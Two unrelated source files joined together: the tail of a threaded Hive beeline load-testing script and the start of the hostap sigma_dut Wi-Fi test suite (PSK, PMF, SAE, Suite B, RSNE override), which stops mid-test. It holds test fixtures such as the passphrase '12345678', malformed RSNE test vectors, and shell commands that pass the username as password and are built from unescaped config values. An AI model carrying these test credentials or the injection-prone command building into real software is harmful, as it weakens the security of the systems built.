    user_list = machine_config.get('hive', 'user_list', 'hive,ambari-qa,hdfs')
    user_list = user_list.split(",")

    while datetime.datetime.now() < end_time:
        thread_list = []
        for i in range(0, options.no_of_threads):
            for j in range(0, len(user_list)):
                t = threading.Thread(target=execute,
                                     args=(system_requests, machine_config,
                                           user_list[j], options.no_of_execution,))
                thread_list.append(t)
        for thread in thread_list:
            thread.start()
        for thread in thread_list:
            thread.join()


def execute(system_requests, machine_config, user, no_of_execution):
    for i in range(0, no_of_execution):
        security_enabled = machine_config.get('cluster', 'security', False)
        user = machine_config.get(user, 'user', user)
        principal = machine_config.get(user, 'principal', None)
        keytab = machine_config.get(user, 'keytab', None)
        hive_jdbc_url = machine_config.get('hive', 'hive_jdbc_url', None)
        database = machine_config.get('hive', 'database', 'default')
        random_numbers = random.randint(100000000000, 999999999999)
        sleep_time = machine_config.get('hive', 'sleep_time', '10')

        kinit_command = ""
        if security_enabled == 'True':
            kinit_command = "/usr/bin/kinit -kt {0} {1};".format(keytab, principal)

        hive_command = "{0} /usr/bin/beeline -u '{1}' -n {2} -p {3} -d org.apache.hive.jdbc.HiveDriver -e 'use {4};'".format(
            kinit_command, hive_jdbc_url, user, user, database)
        code, stdout = system_requests.execute_command(hive_command, user)
        time.sleep(int(sleep_time))
        AuditLogger.info("HIVE COMMAND RESULT FOR USE DATABASE NAME" + str(database) + " : " + str(stdout))

        hive_command = "{0} /usr/bin/beeline -u '{1}' -n {2} -p {3} -d org.apache.hive.jdbc.HiveDriver -e 'create table {4}.test_table_{5}(id Int, name String);'".format(
            kinit_command, hive_jdbc_url, user, user, database, random_numbers)
        code, stdout = system_requests.execute_command(hive_command, user)
        time.sleep(int(sleep_time))
        AuditLogger.info("HIVE COMMAND RESULT FOR CREATE TABLE NAME test_table_" + str(random_numbers) + " : " + str(stdout))

        hive_command = "{0} /usr/bin/beeline -u '{1}' -n {2} -p {3} -d org.apache.hive.jdbc.HiveDriver -e 'drop table if exists {4}.test_table_{5};'".format(
            kinit_command, hive_jdbc_url, user, user, database, random_numbers)
        code, stdout = system_requests.execute_command(hive_command, user)
        time.sleep(int(sleep_time))
        AuditLogger.info("HIVE COMMAND RESULT FOR DROP TABLE NAME test_table_" + str(random_numbers) + " : " + str(stdout))

        hive_command = "{0} /usr/bin/beeline -u '{1}' -n {2} -p {3} -d org.apache.hive.jdbc.HiveDriver -e 'show databases;'".format(
            kinit_command, hive_jdbc_url, user, user)
        code, stdout = system_requests.execute_command(hive_command, user)
        time.sleep(int(sleep_time))
        AuditLogger.info("HIVE COMMAND RESULT FOR SHOW DATABASES" + str(database) + " : " + str(stdout))


if __name__ == '__main__':
    main()
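# Example invocation (illustrative only; the audit_logger, config, and
# system_requests helper modules shipped with this tool must be importable,
# and the beeline/kinit paths are as hard-coded above):
#
#   python hive_commands.py --days 2 --threads 4 --execution 100
#
# Each outer iteration spawns (threads x users) worker threads, and every
# worker runs the use/create/drop/show beeline cycle no_of_execution times.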
test_sigma_dut.py
# Test cases for sigma_dut
# Copyright (c) 2017, Qualcomm Atheros, Inc.
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.

import binascii
import logging
logger = logging.getLogger()
import os
import socket
import struct
import subprocess
import threading
import time

import hostapd
from utils import HwsimSkip
from hwsim import HWSimRadio
import hwsim_utils
from test_dpp import check_dpp_capab, update_hapd_config
from test_suite_b import check_suite_b_192_capa, suite_b_as_params, suite_b_192_rsa_ap_params
from test_ap_eap import check_eap_capa
from test_ap_hs20 import hs20_ap_params

def check_sigma_dut():
    if not os.path.exists("./sigma_dut"):
        raise HwsimSkip("sigma_dut not available")

def to_hex(s):
    return binascii.hexlify(s.encode()).decode()

def from_hex(s):
    return binascii.unhexlify(s).decode()

def sigma_dut_cmd(cmd, port=9000, timeout=2):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
                         socket.IPPROTO_TCP)
    sock.settimeout(timeout)
    addr = ('127.0.0.1', port)
    sock.connect(addr)
    sock.send(cmd.encode() + b"\r\n")
    try:
        res = sock.recv(1000).decode()
        running = False
        done = False
        for line in res.splitlines():
            if line.startswith("status,RUNNING"):
                running = True
            elif line.startswith("status,INVALID"):
                done = True
            elif line.startswith("status,ERROR"):
                done = True
            elif line.startswith("status,COMPLETE"):
                done = True
        if running and not done:
            # Read the actual response
            res = sock.recv(1000).decode()
    except:
        res = ''
        pass
    sock.close()
    res = res.rstrip()
    logger.debug("sigma_dut: '%s' --> '%s'" % (cmd, res))
    return res

def sigma_dut_cmd_check(cmd, port=9000, timeout=2):
    res = sigma_dut_cmd(cmd, port=port, timeout=timeout)
    if "COMPLETE" not in res:
        raise Exception("sigma_dut command failed: " + cmd)
    return res

def start_sigma_dut(ifname, debug=False, hostapd_logdir=None, cert_path=None,
                    bridge=None):
    check_sigma_dut()
    cmd = ['./sigma_dut',
           '-M', ifname,
           '-S', ifname,
           '-F', '../../hostapd/hostapd',
           '-G',
           '-w', '/var/run/wpa_supplicant/',
           '-j', ifname]
    if debug:
        cmd += ['-d']
    if hostapd_logdir:
        cmd += ['-H', hostapd_logdir]
    if cert_path:
        cmd += ['-C', cert_path]
    if bridge:
        cmd += ['-b', bridge]
    sigma = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
    for i in range(20):
        try:
            res = sigma_dut_cmd("HELLO")
            break
        except:
            time.sleep(0.05)
    return sigma

def stop_sigma_dut(sigma):
    sigma.terminate()
    sigma.wait()
    out, err = sigma.communicate()
    logger.debug("sigma_dut stdout: " + str(out.decode()))
    logger.debug("sigma_dut stderr: " + str(err.decode()))

def sigma_dut_wait_connected(ifname):
    for i in range(50):
        res = sigma_dut_cmd("sta_is_connected,interface," + ifname)
        if "connected,1" in res:
            break
        time.sleep(0.2)
        if i == 49:
            raise Exception("Connection did not complete")

def test_sigma_dut_basic(dev, apdev):
    """sigma_dut basic functionality"""
    sigma = start_sigma_dut(dev[0].ifname)

    res = sigma_dut_cmd("UNKNOWN")
    if "status,INVALID,errorCode,Unknown command" not in res:
        raise Exception("Unexpected sigma_dut response to unknown command")

    tests = [("ca_get_version", "status,COMPLETE,version,1.0"),
             ("device_get_info", "status,COMPLETE,vendor"),
             ("device_list_interfaces,interfaceType,foo", "status,ERROR"),
             ("device_list_interfaces,interfaceType,802.11",
              "status,COMPLETE,interfaceType,802.11,interfaceID," + dev[0].ifname)]
    for cmd, response in tests:
        res = sigma_dut_cmd(cmd)
        if response not in res:
            raise Exception("Unexpected %s response: %s" % (cmd, res))

    stop_sigma_dut(sigma)

def test_sigma_dut_open(dev, apdev):
    """sigma_dut controlled
open network association""" try: run_sigma_dut_open(dev, apdev) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_open(dev, apdev): ifname = dev[0].ifname sigma = start_sigma_dut(ifname) hapd = hostapd.add_ap(apdev[0], {"ssid": "open"}) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_encryption,interface,%s,ssid,%s,encpType,none" % (ifname, "open")) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s" % (ifname, "open")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_psk_pmf(dev, apdev): """sigma_dut controlled PSK+PMF association""" try: run_sigma_dut_psk_pmf(dev, apdev) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_psk_pmf(dev, apdev): ifname = dev[0].ifname sigma = start_sigma_dut(ifname) ssid = "test-pmf-required" params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678") params["wpa_key_mgmt"] = "WPA-PSK-SHA256" params["ieee80211w"] = "2" hapd = hostapd.add_ap(apdev[0], params) sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required" % (ifname, "test-pmf-required", "12345678")) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-pmf-required")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_psk_pmf_bip_cmac_128(dev, apdev): """sigma_dut controlled PSK+PMF association with BIP-CMAC-128""" try: run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-CMAC-128", "AES-128-CMAC") finally: dev[0].set("ignore_old_scan_res", "0") def test_sigma_dut_psk_pmf_bip_cmac_256(dev, apdev): """sigma_dut controlled PSK+PMF association with BIP-CMAC-256""" try: run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-CMAC-256", "BIP-CMAC-256") finally: dev[0].set("ignore_old_scan_res", "0") def test_sigma_dut_psk_pmf_bip_gmac_128(dev, apdev): """sigma_dut controlled PSK+PMF association with BIP-GMAC-128""" try: run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-128", "BIP-GMAC-128") finally: dev[0].set("ignore_old_scan_res", "0") def test_sigma_dut_psk_pmf_bip_gmac_256(dev, apdev): """sigma_dut controlled PSK+PMF association with BIP-GMAC-256""" try: run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-256", "BIP-GMAC-256") finally: dev[0].set("ignore_old_scan_res", "0") def test_sigma_dut_psk_pmf_bip_gmac_256_mismatch(dev, apdev): """sigma_dut controlled PSK+PMF association with BIP-GMAC-256 mismatch""" try: run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-256", "AES-128-CMAC", failure=True) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_psk_pmf_cipher(dev, apdev, sigma_cipher, hostapd_cipher, failure=False): ifname = dev[0].ifname sigma = start_sigma_dut(ifname) ssid = "test-pmf-required" params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678") params["wpa_key_mgmt"] = "WPA-PSK-SHA256" params["ieee80211w"] = "2" params["group_mgmt_cipher"] = hostapd_cipher hapd = hostapd.add_ap(apdev[0], params) 
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required,GroupMgntCipher,%s" % (ifname, "test-pmf-required", "12345678", sigma_cipher)) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-pmf-required")) if failure: ev = dev[0].wait_event(["CTRL-EVENT-NETWORK-NOT-FOUND", "CTRL-EVENT-CONNECTED"], timeout=10) if ev is None: raise Exception("Network selection result not indicated") if "CTRL-EVENT-CONNECTED" in ev: raise Exception("Unexpected connection") res = sigma_dut_cmd("sta_is_connected,interface," + ifname) if "connected,1" in res: raise Exception("Connection reported") else: sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_sae(dev, apdev): """sigma_dut controlled SAE association""" if "SAE" not in dev[0].get_capability("auth_alg"): raise HwsimSkip("SAE not supported") ifname = dev[0].ifname sigma = start_sigma_dut(ifname) ssid = "test-sae" params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678") params['wpa_key_mgmt'] = 'SAE' params["ieee80211w"] = "2" params['sae_groups'] = '19 20 21' hapd = hostapd.add_ap(apdev[0], params) sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678")) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) if dev[0].get_status_field('sae_group') != '19': raise Exception("Expected default SAE group not used") sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,ECGroupID,20" % (ifname, "test-sae", "12345678")) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) if dev[0].get_status_field('sae_group') != '20': raise Exception("Expected SAE group not used") sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_sae_password(dev, apdev): """sigma_dut controlled SAE association and long password""" if "SAE" not in dev[0].get_capability("auth_alg"): raise HwsimSkip("SAE not supported") ifname = dev[0].ifname sigma = start_sigma_dut(ifname) try: ssid = "test-sae" params = hostapd.wpa2_params(ssid=ssid) params['sae_password'] = 100*'B' params['wpa_key_mgmt'] = 'SAE' params["ieee80211w"] = "2" hapd = hostapd.add_ap(apdev[0], params) sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) 
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", 100*'B')) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) finally: stop_sigma_dut(sigma) def test_sigma_dut_sta_override_rsne(dev, apdev): """sigma_dut and RSNE override on STA""" try: run_sigma_dut_sta_override_rsne(dev, apdev) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_sta_override_rsne(dev, apdev): ifname = dev[0].ifname sigma = start_sigma_dut(ifname) ssid = "test-psk" params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678") hapd = hostapd.add_ap(apdev[0], params) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) tests = ["30120100000fac040100000fac040100000fac02", "30140100000fac040100000fac040100000fac02ffff"] for test in tests: sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,type,PSK,passphrase,%s,EncpType,aes-ccmp,KeyMgmtType,wpa2" % (ifname, "test-psk", "12345678")) sigma_dut_cmd_check("dev_configure_ie,interface,%s,IE_Name,RSNE,Contents,%s" % (ifname, test)) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-psk")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) dev[0].dump_monitor() sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,type,PSK,passphrase,%s,EncpType,aes-ccmp,KeyMgmtType,wpa2" % (ifname, "test-psk", "12345678")) sigma_dut_cmd_check("dev_configure_ie,interface,%s,IE_Name,RSNE,Contents,300101" % ifname) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-psk")) ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"]) if ev is None: raise Exception("Association rejection not reported") if "status_code=40" not in ev: raise Exception("Unexpected status code: " + ev) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_ap_psk(dev, apdev): """sigma_dut controlled AP""" with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-psk", psk="12345678", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_pskhex(dev, apdev, params): """sigma_dut controlled AP and PSKHEX""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_pskhex.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: psk = "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef" sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSKHEX," + psk) sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-psk", raw_psk=psk, scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_psk_sha256(dev, apdev, params): """sigma_dut controlled AP PSK SHA256""" logdir = 
os.path.join(params['logdir'], "sigma_dut_ap_psk_sha256.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK-256,PSK,12345678") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-psk", key_mgmt="WPA-PSK-SHA256", psk="12345678", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_suite_b(dev, apdev, params): """sigma_dut controlled STA Suite B""" check_suite_b_192_capa(dev) logdir = params['logdir'] with open("auth_serv/ec2-ca.pem", "r") as f: with open(os.path.join(logdir, "suite_b_ca.pem"), "w") as f2: f2.write(f.read()) with open("auth_serv/ec2-user.pem", "r") as f: with open("auth_serv/ec2-user.key", "r") as f2: with open(os.path.join(logdir, "suite_b.pem"), "w") as f3: f3.write(f.read()) f3.write(f2.read()) dev[0].flush_scan_cache() params = suite_b_as_params() params['ca_cert'] = 'auth_serv/ec2-ca.pem' params['server_cert'] = 'auth_serv/ec2-server.pem' params['private_key'] = 'auth_serv/ec2-server.key' params['openssl_ciphers'] = 'SUITEB192' hostapd.add_ap(apdev[1], params) params = {"ssid": "test-suite-b", "wpa": "2", "wpa_key_mgmt": "WPA-EAP-SUITE-B-192", "rsn_pairwise": "GCMP-256", "group_mgmt_cipher": "BIP-GMAC-256", "ieee80211w": "2", "ieee8021x": "1", 'auth_server_addr': "127.0.0.1", 'auth_server_port': "18129", 'auth_server_shared_secret': "radius", 'nas_identifier': "nas.w1.fi"} hapd = hostapd.add_ap(apdev[0], params) ifname = dev[0].ifname sigma = start_sigma_dut(ifname, cert_path=logdir) sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_security,type,eaptls,interface,%s,ssid,%s,PairwiseCipher,AES-GCMP-256,GroupCipher,AES-GCMP-256,GroupMgntCipher,BIP-GMAC-256,keymgmttype,SuiteB,clientCertificate,suite_b.pem,trustedRootCA,suite_b_ca.pem,CertType,ECC" % (ifname, "test-suite-b")) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-suite-b")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_suite_b_rsa(dev, apdev, params): """sigma_dut controlled STA Suite B (RSA)""" check_suite_b_192_capa(dev) logdir = params['logdir'] with open("auth_serv/rsa3072-ca.pem", "r") as f: with open(os.path.join(logdir, "suite_b_ca_rsa.pem"), "w") as f2: f2.write(f.read()) with open("auth_serv/rsa3072-user.pem", "r") as f: with open("auth_serv/rsa3072-user.key", "r") as f2: with open(os.path.join(logdir, "suite_b_rsa.pem"), "w") as f3: f3.write(f.read()) f3.write(f2.read()) dev[0].flush_scan_cache() params = suite_b_192_rsa_ap_params() hapd = hostapd.add_ap(apdev[0], params) ifname = dev[0].ifname sigma = start_sigma_dut(ifname, cert_path=logdir) cmd = "sta_set_security,type,eaptls,interface,%s,ssid,%s,PairwiseCipher,AES-GCMP-256,GroupCipher,AES-GCMP-256,GroupMgntCipher,BIP-GMAC-256,keymgmttype,SuiteB,clientCertificate,suite_b_rsa.pem,trustedRootCA,suite_b_ca_rsa.pem,CertType,RSA" % (ifname, "test-suite-b") tests = ["", ",TLSCipher,TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", ",TLSCipher,TLS_DHE_RSA_WITH_AES_256_GCM_SHA384"] for extra 
in tests: sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check(cmd + extra) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-suite-b")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_ap_suite_b(dev, apdev, params): """sigma_dut controlled AP Suite B""" check_suite_b_192_capa(dev) logdir = os.path.join(params['logdir'], "sigma_dut_ap_suite_b.sigma-hostapd") params = suite_b_as_params() params['ca_cert'] = 'auth_serv/ec2-ca.pem' params['server_cert'] = 'auth_serv/ec2-server.pem' params['private_key'] = 'auth_serv/ec2-server.key' params['openssl_ciphers'] = 'SUITEB192' hostapd.add_ap(apdev[1], params) with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-suite-b,MODE,11ng") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,18129,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,SuiteB") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-suite-b", key_mgmt="WPA-EAP-SUITE-B-192", ieee80211w="2", openssl_ciphers="SUITEB192", eap="TLS", identity="tls user", ca_cert="auth_serv/ec2-ca.pem", client_cert="auth_serv/ec2-user.pem", private_key="auth_serv/ec2-user.key", pairwise="GCMP-256", group="GCMP-256", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_cipher_gcmp_128(dev, apdev, params): """sigma_dut controlled AP with GCMP-128/BIP-GMAC-128 cipher""" run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-128", "BIP-GMAC-128", "GCMP") def test_sigma_dut_ap_cipher_gcmp_256(dev, apdev, params): """sigma_dut controlled AP with GCMP-256/BIP-GMAC-256 cipher""" run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-256", "BIP-GMAC-256", "GCMP-256") def test_sigma_dut_ap_cipher_ccmp_128(dev, apdev, params): """sigma_dut controlled AP with CCMP-128/BIP-CMAC-128 cipher""" run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128", "BIP-CMAC-128", "CCMP") def test_sigma_dut_ap_cipher_ccmp_256(dev, apdev, params): """sigma_dut controlled AP with CCMP-256/BIP-CMAC-256 cipher""" run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-256", "BIP-CMAC-256", "CCMP-256") def test_sigma_dut_ap_cipher_ccmp_gcmp_1(dev, apdev, params): """sigma_dut controlled AP with CCMP-128+GCMP-256 ciphers (1)""" run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128 AES-GCMP-256", "BIP-GMAC-256", "CCMP") def test_sigma_dut_ap_cipher_ccmp_gcmp_2(dev, apdev, params): """sigma_dut controlled AP with CCMP-128+GCMP-256 ciphers (2)""" run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128 AES-GCMP-256", "BIP-GMAC-256", "GCMP-256", "CCMP") def test_sigma_dut_ap_cipher_gcmp_256_group_ccmp(dev, apdev, params): """sigma_dut controlled AP with GCMP-256/CCMP/BIP-GMAC-256 cipher""" run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-256", "BIP-GMAC-256", "GCMP-256", "CCMP", "AES-CCMP-128") def run_sigma_dut_ap_cipher(dev, apdev, params, ap_pairwise, ap_group_mgmt, sta_cipher, sta_cipher_group=None, ap_group=None): check_suite_b_192_capa(dev) logdir = os.path.join(params['logdir'], 
"sigma_dut_ap_cipher.sigma-hostapd") params = suite_b_as_params() params['ca_cert'] = 'auth_serv/ec2-ca.pem' params['server_cert'] = 'auth_serv/ec2-server.pem' params['private_key'] = 'auth_serv/ec2-server.key' params['openssl_ciphers'] = 'SUITEB192' hostapd.add_ap(apdev[1], params) with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-suite-b,MODE,11ng") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,18129,PASSWORD,radius") cmd = "ap_set_security,NAME,AP,KEYMGNT,SuiteB,PMF,Required,PairwiseCipher,%s,GroupMgntCipher,%s" % (ap_pairwise, ap_group_mgmt) if ap_group: cmd += ",GroupCipher,%s" % ap_group sigma_dut_cmd_check(cmd) sigma_dut_cmd_check("ap_config_commit,NAME,AP") if sta_cipher_group is None: sta_cipher_group = sta_cipher dev[0].connect("test-suite-b", key_mgmt="WPA-EAP-SUITE-B-192", ieee80211w="2", openssl_ciphers="SUITEB192", eap="TLS", identity="tls user", ca_cert="auth_serv/ec2-ca.pem", client_cert="auth_serv/ec2-user.pem", private_key="auth_serv/ec2-user.key", pairwise=sta_cipher, group=sta_cipher_group, scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_override_rsne(dev, apdev): """sigma_dut controlled AP overriding RSNE""" with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678") sigma_dut_cmd_check("dev_configure_ie,NAME,AP,interface,%s,IE_Name,RSNE,Contents,30180100000fac040200ffffffff000fac040100000fac020c00" % iface) sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-psk", psk="12345678", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_sae(dev, apdev, params): """sigma_dut controlled AP with SAE""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_sae.sigma-hostapd") if "SAE" not in dev[0].get_capability("auth_alg"): raise HwsimSkip("SAE not supported") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].request("SET sae_groups ") dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678", ieee80211w="2", scan_freq="2412") if dev[0].get_status_field('sae_group') != '19': raise Exception("Expected default SAE group not used") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_sae_password(dev, apdev, params): """sigma_dut controlled AP with SAE and long password""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_sae_password.sigma-hostapd") if "SAE" not in dev[0].get_capability("auth_alg"): raise HwsimSkip("SAE not supported") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK," + 100*'C') 